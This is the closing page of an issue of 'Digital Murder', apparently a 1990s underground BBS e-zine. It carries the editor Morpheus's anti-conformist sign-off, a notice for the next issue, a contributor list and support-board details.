                                                                        18


   Maybe some of these will keep your brain clear but not washed
   like most in this country.  You know the ones. . . those that
   are insecure about their future.  Those are the people we all
   remember back in High School;  the guys and  girls  who  were
   alwayz pushing themselves into  the  system-  alwayz  pushing
   themselves into the clubs and cliques- pushing  their  future
   through a sieve, draining out all their unique qualities till
   all that's left is another person totally conditioned to be a
   corporate slave.  Think about this.  Think about and question
   everything.

   Thanks for reading and supporting Digital Murder.   Issue  #3
   will be out December 15th.  FEEL FREE to help out!  Don't let
   those fascist shits on Capital Hill fool  you  into  thinking
   that you can't still voice your opinion or share information!
   Call The Backdoor, leave me, Morpheus, feedback.  Send in  an
   article or just drop in and say what's on your mind.

   The 'zine should be better now that it'z getting more support
   as well as the fact that I've moved to the most  boring  city
   in the whole phucking world.  The most ''exciting'' thing  to
   do around here is this building that is the home of  a  movie
   theater that shows old movies, a  skating  rink  and  bowling
   alley for pre-teen preppies, and an arcade featuring billybob
   and his cousins playing pool for car titles while I waste  my
   money on one of the seven video  games  in  the  city's  only
   arcade.  At least the old city I lived in isn't too far  away
   from here.  So while you  are  walking  around  breathing  in
   America's cold, toxic, city air or feasting on the carcass of
   a dead turkey for thanksgiving, think of your editor  slaving
   over the keys to bring forth another edition of the  one  and
   only Digital Murder.

   Contributors:  Morpheus, Technysis, Chizz, Zapped, NeuronGod,
   Mystic Blade, and Digital Terrorist.

   Support Boards:  Backdoor (901)/386.6455

   Wanna be a support board?  Leave Morpheus feedback on Backdoor.


\n

UD#9: Digital Murder U/D
[X-Modem/UnltdBlk] UD:
Downloaded From P-80 International Information Systems 304-744-2253